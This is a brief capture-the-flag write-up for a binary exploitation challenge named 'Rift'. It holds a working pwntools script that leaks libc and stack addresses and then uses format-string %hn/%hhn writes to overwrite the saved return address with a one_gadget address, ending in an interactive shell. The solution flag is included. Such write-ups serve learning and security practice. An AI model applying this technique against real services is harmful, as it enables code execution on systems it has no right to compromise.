Rift

Challenge

A format-string write primitive is used to overwrite the saved return address (RIP) byte-by-byte with a one_gadget address in libc.

Solution

Key solve code:

from pwn import *

r = remote("localhost", 1337)

# Leak a libc pointer with %p and derive the libc base and one_gadget address
# (offsets 0x1bc8d0 and 0x449d3 are the values used in the original solve).
r.sendline(b"%p")
libc_leak = int(r.recvline(), 16)
base = libc_leak - 0x1bc8d0
onegadget = base + 0x449d3

# Leak a stack pointer from argument slot 8 and locate the saved RIP slot.
r.sendline(b"%8$p")
stack_leak = int(r.recvline(), 16)
rip_addr = stack_leak - 8

# Two-stage write, one byte of the target per iteration:
#   1. %hn at slot 13 rewrites the low 16 bits of a stack pointer so that it
#      points at rip_addr + i;
#   2. %hhn at slot 39 (the pointer just adjusted) writes byte i of onegadget.
for i in range(6):
    r.sendline(f"%{(rip_addr & 0xffff) + i}c%13$hn".encode())
    r.recvline()
    r.sendline(f"%{(onegadget >> (8 * i)) & 0xff}c%39$hhn".encode())
    r.recvline()

r.interactive()

Flag

gigem{ropping_in_style}